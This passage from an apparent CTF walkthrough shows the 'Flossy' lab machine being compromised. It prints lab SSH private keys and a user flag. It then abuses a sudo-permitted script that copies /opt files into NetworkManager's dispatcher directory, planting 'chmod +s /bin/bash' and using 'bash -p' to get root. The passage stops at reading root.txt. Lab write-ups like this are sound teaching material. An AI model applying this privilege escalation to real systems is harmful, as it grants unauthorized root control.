..=|\n+----[SHA256]-----+\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ls -la\ntotal 16\ndrwx------ 2 malo malo 4096 Apr 16 08:40 .\ndrwxr-xr-x 5 malo malo 4096 Apr 16 08:40 ..\n-rw------- 1 malo malo 2590 Apr 16 08:40 id_rsa\n-rw-r--r-- 1 malo malo  565 Apr 16 08:40 id_rsa.pub\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ mv id_rsa.pub authorized_keys\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ls -la\ntotal 16\ndrwx------ 2 malo malo 4096 Apr 16 08:40 .\ndrwxr-xr-x 5 malo malo 4096 Apr 16 08:40 ..\n-rw-r--r-- 1 malo malo  565 Apr 16 08:40 authorized_keys\n-rw------- 1 malo malo 2590 Apr 16 08:40 id_rsa\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ cat id_rsa    \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAjPqsD8YtZEi0cH9TwSAwvn+aKUcN1fOV24YgqFhL44dfzny8JFhR\n4dxzDznZ63K0HEcE+\/rY7EBbT5xk1QAUzm3ugT60j4wmzMEVkefwxnKEJxqqKFVLDc4oKE\n8pt7pNA3KvCCY4BnAeXI2KBaEx0hOSN82QljkHekXcSPpdxB5CCbImRz8OYhG9FGx5UXhM\nEiQIbRi0I1Tjwnxn79OmT8\/gCrhgR7qrdN9dAuUDZlZbTXBb3Zsg1B\/756HTHSSPZ5+lV\/\nJ62ueMQ55iC0HDhB8YBmUEmLJceTpxKnD7bwGWI2SL1SEJxS1Bo3HJxIJc8QWI20\/2iRXO\njkxqkSx8b0u3xLZdQrr5e+4tcBs04cxzPsdlpsHJr1uoJrgdoco1SJY2RMBJQJlF6j8Qqa\nsYq+ygEc0drjqXIy8J26WgVcCHrvkJPOKx1N7gWqSbuJIZKq3bqlAlAT9KIRgrzjNzUN0l\n8RBzDvliJHcMmHphu6RP9c0EFkjxzxbGFSUwNb3lAAAFgHPPbb5zz22+AAAAB3NzaC1yc2\nEAAAGBAIz6rA\/GLWRItHB\/U8EgML5\/milHDdXzlduGIKhYS+OHX858vCRYUeHccw852ety\ntBxHBPv62OxAW0+cZNUAFM5t7oE+tI+MJszBFZHn8MZyhCcaqihVSw3OKChPKbe6TQNyrw\ngmOAZwHlyNigWhMdITkjfNkJY5B3pF3Ej6XcQeQgmyJkc\/DmIRvRRseVF4TBIkCG0YtCNU\n48J8Z+\/Tpk\/P4Aq4YEe6q3TfXQLlA2ZWW01wW92bINQf++eh0x0kj2efpVfyetrnjEOeYg\ntBw4QfGAZlBJiyXHk6cSpw+28BliNki9UhCcUtQaNxycSCXPEFiNtP9okVzo5MapEsfG9L\nt8S2XUK6+XvuLXAbNOHMcz7HZabBya9bqCa4HaHKNUiWNkTASUCZReo\/EKmrGKvsoBHNHa\n46lyMvCduloFXAh675CTzisdTe4Fqkm7iSGSqt26pQJQE\/SiEYK84zc1DdJfEQcw75YiR3\nDJh6YbukT\/XNBBZI8c8WxhUlMDW95QAAAAMBAAEAAAGACrF82Zlzmfa10Q6nYK+7Yse0\/s\nqH7yGRzVvoIDzKTNDY4IWvk6YrV9Fr3MzLj
cNejAKLCz3ktE7RXkGDmHBwI5RNEfqaoYTE\n8KT4qN+J8NOA2KJ6I6MMlVh8zUnr5Sa5briFND4J49sfQm\/t9y1Z5RBc9+ScwfhDa+\/enJ\n54\/EY7RhcANkk\/IwsrZ2Au95IDWyDmjrff+goXWIotLBDGvakL2mRP0UEEflHu8ShD0MBe\nHoqWPUHmBJEEf3ZT2BMMvL6P1cjGuqoEZUtsFe+uV+FFJ+TpYeKxCh5srnXEm80b5WUifD\nCN1XdRZT9I6Oicldk9KS\/+eZuP2Edm0KXBIdHSd2GI+5snvO2Pv8e4F7hC1Nlm7eknGnF4\nfT\/vIfheNMN3j\/8wzirTckT0Mu62FXofBANg3biOV1w0Mnxoy06NRuvkVqxl6MWLzFC4yo\nZKCC6rHx1pG94O6AJjW4puHGLGSkM5a6sAh6tr1yYkmGbpSlHXheU1B03zbvjMfpJhAAAA\nwHQBvKTvC\/ZFAeZvITgubmozZ7JtB7tOH8Ku6V4jkCW14t0C1LYiyUpPEhKuiTgjjMMft2\nzTmq3FNkpu\/OEiGrjYqDE\/YZ6fv\/RONh5GrAH9\/dCGzi0cGiMyfABNlLVNKUOXpQPWTRwi\nWU2SU9aVe1L0Kjaeny\/fJrvd3FrOqL7a3NKFrLJ28qWiaSf2uxFL5Zo3PfcsB6eaR6Beeo\nn+qy6WMkO1a36RR5SmrQaLYc9lzJQKb4HzcH4tjI6gsBpCqQAAAMEAxFLq1p3JqvmmmWUP\n6THZPZpMa8yQpQnrUvA8OGwobyJkG43i3uLffZ2VQCE49z\/d572qQFJZ9lzCLJVMfiggnz\n6fn6NFuNqPxEq\/9CdYo4+JqTleVleDjYPhH0uWKVayh0A3Z7jhhvSpb39Nlz556Ygs5RO3\nQH3HK3JdxVMMJ50ctek5HyC41XDTRNRDEtFx5H0IRIarqtf15JKkuDzTKC7YQox9vDUQix\nstDfPjv1+WnXQiR0KhWC3rNJpwzcHtAAAAwQC31RE2D0wFZ4ixmPxeiJ0Z\/gV63mzoK4KQ\n3kadia\/zeafVa3Imi+1N1hRIgBdBQmtXDYVjQtfeX12no0kf6fN\/j6D3ZSmBHV6kDa+kdT\ntJf3jL37eGyyRr3lI+jqcy2ccwsWOSKZxJckPyxZvV+C5GyPMxi3gwyvin7\/zaZfq6jrYI\nmw1RrpRB8VfrgbPJl20BP9kFqb0\/\/jtb666j9Mojy12KmCl\/PW74YGD6ver650UMlfe1i\/\nUUV5c2OU3iTNkAAAALbWFsb0BmbG9zc3k=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Then try using it from Kali:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ vim id_rsa                                                            \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ ssh malo@192.168.0.104 -i id_rsa \nLinux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact 
distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Apr 16 08:10:28 2024 from 192.168.0.143\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd \/dev\/pts\n\u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$ ls -la\ntotal 0\ndrwxr-xr-x  2 root root      0 Apr 16 07:32 .\ndrwxr-xr-x 17 root root   3300 Apr 16 07:33 ..\ncrw--w----  1 malo tty  136, 0 Apr 16 08:40 0\ncrw--w----  1 malo tty  136, 1 Apr 16 08:42 1\nc---------  1 root root   5, 2 Apr 16 07:32 ptmx<\/code><\/pre>\n<p>It disappears once the session exits:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ cd \/dev\/pts                                                                                                                                \n\u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$  ls -la\ntotal 0\ndrwxr-xr-x  2 root root      0 Apr 16 07:32 .\ndrwxr-xr-x 17 root root   3300 Apr 16 07:33 ..\ncrw--w----  1 malo tty  136, 0 Apr 16 08:43 0\nc---------  1 root root   5, 2 Apr 16 07:32 ptmx<\/code><\/pre>\n<p>So we cannot exit; we can only nest ssh connections one layer inside another!<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523245.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523245.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416144637745\" \/><\/div><\/p>\n<p>ssh has an option that forces pseudo-terminal allocation, which we can try:<\/p>\n<pre><code class=\"language-shell\">for i in {1..23} ;do ssh -tt 0 &quot;sleep 1000 &amp;&quot;; done<\/code><\/pre>\n<ul>\n<li>The first <code>-t<\/code> forces ssh to allocate a pseudo-terminal; the second <code>-t<\/code> forces the remote command to run in a pseudo-terminal as well.<\/li>\n<li><code>0<\/code> means execute in pseudo-terminal <code>pts0<\/code>,<\/li>\n<li><code>sleep 1000 &amp;<\/code> runs sleep in the background as a pause, so it does not block the ssh connection and the pts is kept<\/li>\n<\/ul>\n<p>Then just connect to pseudo-terminal 0:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$ ssh 0      \nLinux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Apr 16 08:57:47 2024 from 127.0.0.1\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ tty\n\/dev\/pts\/24<\/code><\/pre>\n<p>Then wait a moment and it will be sent over:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy ~ \n\u2570\u2500$ -----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAlfKkxqQRaakvwCsUmqbXFm0cdI4zkp9UcejsdWhZKbuq+9l8l6tP\nNic4xIoq1S++4Xlj8acA9oJG3yFSgwsBNIaqAJq1zxSpDnzBBpSIqZk2OmkHw8BNBth98D\n3RKB5d1SOq0pNiBk4dtQ\/QGgd7S30oHNlqF524Nf4jCJxkMLUk527Ga+cjPmM068DtOZMF\nxfY\/gWrnjk44tigt4QP4hkmMEtshPps4SF6dm544FYghYs+rgCH9tx+DfUl7ZFLnBviGL9\nRzN7yQLUV\/BPFod8SPihd\/s7bSMGfBvopCWFcueL0xAd22Q7CU1jSg4W6+aSfbCSRND3ik\ntz\/SsWN2\/RR2H+MQxB11J5qvLFxq291B0Znoi5sgARZUihDihjhPyVL0dco2wrQtL6ey2B\nedRtX24GejoGuvdqd3\/qHi5R35sZ4zcUCEldNwq0aC\/b3EU\/cmu16nmDuhJZpT2ILj35cr\nng8Faf39ZAeIRFKsyfibnRMxoBwLkWWyEs8h2APLAAAFiGZJHbxmSR28AAAAB3NzaC1yc2\nEAAAGBAJXypMakEWmpL8ArFJqm1xZtHHSOM5KfVHHo7HVoWSm7qvvZfJerTzYnOMSKKtUv\nvuF5Y\/GnAPaCRt8hUoMLATSGqgCatc8UqQ58wQaUiKmZNjppB8PATQbYffA90SgeXdUjqt\nKTYgZOHbUP0BoHe0t9KBzZaheduDX+IwicZDC1JOduxmvnIz5jNOvA7TmTBcX2P4Fq545O\nOLYoLeED+IZJjBLbIT6bOEhenZueOBWIIWLPq4Ah\/bcfg31Je2RS5wb4hi\/Ucze8kC1Ffw\nTxaHfEj4oXf7O20jBnwb6KQlhXLni9MQHdtkOwlNY0oOFuvmkn2wkkTQ94pLc\/0rFjdv0U\ndh\/jEMQddSearyxcatvdQdGZ6IubIAEWVIoQ4oY4T8lS9HXKNsK0LS+nstgXnUbV9uBno6\nBrr3and\/6h4uUd+bGeM3FAhJXTcKtGgv29xFP3Jrtep5g7oSWaU9iC49+XK54PBWn9\/WQH\niERSrMn4m50TMaAcC5FlshLPIdgDywAAAAMBAAEAAAGAOMcNhJfYbhFdnt7RKPQWyoubND\nkqJxFEqPNBIf3WkTpZ9o42Irn\/vuogES+eI2Y2WWsdIIITl8PhsRiNhUgz9x8snRj30ccp\ncm5jqqmwi8OTaI+fnIwivn5YRZEqsw24iv2774tWGTwX\/JjVvB1sHrvv5eifRvz2JR+rRV\nXujBDzPdzQrkfxrOxkvAYr7VqR25EwH8GKl3Rf\/f19zc+ymaqcqwEld+7PY3vMIwJIi0Km\nHaOz9Usppl7864JZAjZvZu+C1hzouj+hXRFLlUZJGIw+N50C+vmaI0Py4ZDwubwisr+QdP\nsihk7GJChCzfs00X5BJ54mUf8o8ka7kjCmoh8niXsOtRGTrThX4U6dy29Fj7q\/NHXC9JG8\nn4j92V3sQJir4b7EKY9C4dwGM2J\/lT41DNluj1iAFj+FZgq\/a1BOiIGAgLOloJW9NtPN2M\nrdqBVbMaP7C2MRpybCSzVb7MOBk4ySynjk9xHoTgLLzQHHhlOBzua5zfiVrfDLt4v5AAAA\nwEAL+tJoildf450QGsY3elLbx9TaUw4uW9bH7YfZ+68eV+TbW5bAzQLV6s1g3Lru1oppVS\nUo2G4uPNyAVHVqU5YNKp0W4f2LfRrwYabEnzGyt5BGWBXHrRl16X2KKk3cuJ\/Lld0wY5aJ\niDZE8AL8Hkt6IeReFhCR3CMDOjoLasTnS0k+CLRG5\/E22bqy5Y\/r07eElt1ptdZXUnbILi\n9\/TQn0BgMJNbACry7TLY
Wf11SAW+HlDqvHIait9JJZVvdsCwAAAMEAxWqZ9pKSh1S0riAy\nKoQVkuZ5OW27JYZKmJO1MrkwIWO+UXpXyrWCdh2grXLDmli1R688VE07xWg25ygtNR9w2d\nUhNYutFu7Mj8IDEVQ3MkQDozdFTNZUmx5cNUKADIbCt88Uwvsw6asQKWuQeyXivLPVkTLI\nVp3MD5e8t2jlt8Bprc52xQ3DG1HqgavwP6KSSDkirflegl\/I74MSEAyYJ24JqWDJwwOYqu\nYGdU5z4TsMm87m9dITdAYtl3fTvXpzAAAAwQDCce6pgoKJiodd1qNdFQzMMBZeP0SqnWUH\nvfNJdcKSgg8wJVEC1nupH8JZNUAuXQSUS0y1vqpVMgtvB\/ui4HBiyWFsHLg181vhGy880U\nHM28Q6oJt8Pi9yJ7iwMMKws5eoYQlV0pvQsh+I+4dhK\/v09DHLQ2iPSbaqAxUcRmkhN0VJ\naK3CMiTLcp06jECr7qKu3wJVsHZf5C36M5H1204Iuah851GpSCbmIZSgSd0BNvQQ2\/k5tW\njbk\/VAmeosQ0kAAAANc29waGllQGZsb3NzeQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523246.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523246.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416150046508\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523247.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523247.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416150106400\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ whoami;id\nsophie\ncuid=1001(sophie) gid=1001(sophie) groups=1001(sophie),100(users)\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ ls -la\ntotal 232\ndrwxr-xr-x  5 sophie sophie   4096 Apr 16 09:01 .\ndrwxr-xr-x  4 root   root     4096 Oct  6  2023 ..\n-rw-------  1 root   root      370 Oct 10  2023 .bash_history\n-rw-r--r--  1 sophie sophie    220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 sophie sophie   3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 sophie sophie   4096 Oct  6  2023 .local\n-rwxr-----  1 root   sophie    962 Oct  6  2023 network\ndrwxr-xr-x 12 sophie sophie   4096 Apr 16 09:00 .oh-my-zsh\n-rw-r--r--  1 sophie sophie    807 Oct  6  2023 .profile\n-rw-r--r--  1 sophie sophie     66 Oct  7  2023 .selected_editor\ndrwx------  2 sophie sophie   4096 Oct 10  2023 .ssh\n-rwxr-xr-x  1 sophie sophie    630 Oct 10  2023 SSHKeySync\n-rwx------  1 sophie sophie     33 Oct 10  2023 user.txt\n-rw-r--r--  1 sophie sophie  51810 Apr 16 09:00 .zcompdump-flossy-5.9\n-r--r--r--  1 sophie sophie 119920 Apr 16 09:00 .zcompdump-flossy-5.9.zwc\n-rw-------  1 sophie sophie     68 Apr 16 09:01 .zsh_history\n-rw-r--r--  1 sophie sophie   3890 Oct  6  2023 .zshrc\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ cat user.txt \n8926c8ba832369c1dc13eed7880585c6\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ sudo -l\nMatching Defaults entries for sophie on flossy:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser sophie may run the following commands on flossy:\n    (ALL : ALL) NOPASSWD: 
\/home\/sophie\/network*\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ file network\nnetwork: Bourne-Again shell script, ASCII text executable\n\u256d\u2500sophie@flossy ~ \n\u2570\u2500$ cat network \n#!\/bin\/bash\nconnected_ip(){\n        connection_type=TCP\n        champ=2\n        ignores=LISTEN\n        lsof_args=-ni\n\n        port_local=&quot;[0-9][0-9][0-9][0-9][0-9]-&gt;&quot;\n\n        lsof &quot;$lsof_args&quot; | grep $connection_type | grep -v &quot;$ignores&quot; |\n        awk &#039;{print $9}&#039; | cut -d : -f $champ | sort | uniq |\n        sed s\/&quot;^$port_local&quot;\/\/\n }\n\ndispatcher() {\n    for s in \/opt\/*; do\n        if [ -f &quot;$s&quot; ]; then\n            d=&quot;\/etc\/NetworkManager\/dispatcher.d\/$(basename $s)&quot;\n            if [ ! -f &quot;$d&quot; ] || [ &quot;$s&quot; -nt &quot;$d&quot; ]; then\n                return 0\n            fi\n        fi\n    done\n    return 1\n}\n\nupdate() {\n    if [[ -z $(find \/opt -type f) ]] ; then\n      exit 0\n    else\n      echo &quot;Updating scripts.&quot;\n      cp \/opt\/* \/etc\/NetworkManager\/dispatcher.d\/\n      chmod +x \/etc\/NetworkManager\/dispatcher.d\/*\n      echo &quot;Scripts updated.&quot;\n    fi\n}\n\ncase &quot;${1}&quot; in\nip)   connected_ip ;;\ndisp) dispatcher ; update ;;\n*)    echo &quot;Usage: .\/$0 option&quot; ;;\nesac<\/code><\/pre>\n<p>See that update function? It can be exploited: it copies every file under <code>\/opt<\/code> to <code>\/etc\/NetworkManager\/dispatcher.d\/<\/code> and grants execute permission. Try crafting a file and getting it executed:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ ls\nexp\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ chmod +x exp\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ head exp \nchmod +s \/bin\/bash\n\u256d\u2500sophie@flossy \/opt 
\n\u2570\u2500$ sudo -l                     \nMatching Defaults entries for sophie on flossy:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser sophie may run the following commands on flossy:\n    (ALL : ALL) NOPASSWD: \/home\/sophie\/network*\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ sudo \/home\/sophie\/network disp\nUpdating scripts.\nScripts updated.\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ ls -l \/bin\/bash               \n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n\u256d\u2500sophie@flossy \/opt \n\u2570\u2500$ cd \/etc\/NetworkManager\/dispatcher.d\/    \n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ ls -la         \ntotal 28\ndrwxr-xr-x 5 root root 4096 Apr 16 09:11 .\ndrwxr-xr-x 7 root root 4096 Oct  6  2023 ..\n-rwxr-xr-x 1 root root 2293 Mar  9  2023 01-ifupdown\n-rwxr-xr-x 1 root root   19 Apr 16 09:11 exp\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 no-wait.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-down.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-up.d\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ .\/exp                               \nchmod: changing permissions of &#039;\/bin\/bash&#039;: Operation not permitted\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ service networking restart1 \u21b5\nzsh: command not found: service\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ \/etc\/NetworkManager\/dispatcher.d restart\nzsh: permission denied: \/etc\/NetworkManager\/dispatcher.d<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523248.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416151814667\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Check the permissions with the corresponding commands:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general status                                                                                                                          130 \u21b5\nSTATE      CONNECTIVITY  WIFI-HW  WIFI     WWAN-HW  WWAN    \nconnected  unknown       missing  enabled  missing  enabled \n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general hostname\nflossy\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli general permissions\nPERMISSION                                                        VALUE \norg.freedesktop.NetworkManager.checkpoint-rollback                auth  \norg.freedesktop.NetworkManager.enable-disable-connectivity-check  no    \norg.freedesktop.NetworkManager.enable-disable-network             no    \norg.freedesktop.NetworkManager.enable-disable-statistics          no    \norg.freedesktop.NetworkManager.enable-disable-wifi                no    \norg.freedesktop.NetworkManager.enable-disable-wimax               no    \norg.freedesktop.NetworkManager.enable-disable-wwan                no    \norg.freedesktop.NetworkManager.network-control                    yes   \norg.freedesktop.NetworkManager.reload                             auth  
\norg.freedesktop.NetworkManager.settings.modify.global-dns         auth  \norg.freedesktop.NetworkManager.settings.modify.hostname           auth  \norg.freedesktop.NetworkManager.settings.modify.own                auth  \norg.freedesktop.NetworkManager.settings.modify.system             auth  \norg.freedesktop.NetworkManager.sleep-wake                         no    \norg.freedesktop.NetworkManager.wifi.scan                          auth  \norg.freedesktop.NetworkManager.wifi.share.open                    no    \norg.freedesktop.NetworkManager.wifi.share.protected               no<\/code><\/pre>\n<p>Then we see:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523249.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523249.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416152108792\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ nmcli connection up lo\nConnection successfully activated (D-Bus active path: \/org\/freedesktop\/NetworkManager\/ActiveConnection\/2)\n\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ ls -l \/bin\/bash \n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n<p>It executed successfully!!!<\/p>\n<p>Now try to grab the flag!!!!<\/p>\n<pre><code 
class=\"language-bash\">\u256d\u2500sophie@flossy \/etc\/NetworkManager\/dispatcher.d \n\u2570\u2500$ bash -p\nbash-5.2# whoami;id\nroot\nuid=1001(sophie) gid=1001(sophie) euid=0(root) egid=0(root) groups=0(root),100(users),1001(sophie)\nbash-5.2# ls -la\ntotal 28\ndrwxr-xr-x 5 root root 4096 Apr 16 09:11 .\ndrwxr-xr-x 7 root root 4096 Oct  6  2023 ..\n-rwxr-xr-x 1 root root 2293 Mar  9  2023 01-ifupdown\n-rwxr-xr-x 1 root root   19 Apr 16 09:11 exp\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 no-wait.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-down.d\ndrwxr-xr-x 2 root root 4096 Mar  9  2023 pre-up.d\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 40\ndrwx------  6 root root 4096 Apr 16 07:33 .\ndrwxr-xr-x 18 root root 4096 Jul 22  2023 ..\nlrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct  6  2023 .local\ndrwxr-xr-x  4 root root 4096 Oct 10  2023 .npm\ndrwxr-xr-x 12 root root 4096 Sep 19  2023 .oh-my-zsh\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   33 Oct  7  2023 root.txt\ndrwx------  2 root root 4096 Oct 10  2023 .ssh\n-rw-r--r--  1 root root 3890 Jul 22  2023 .zshrc\nbash-5.2# cat root.txt 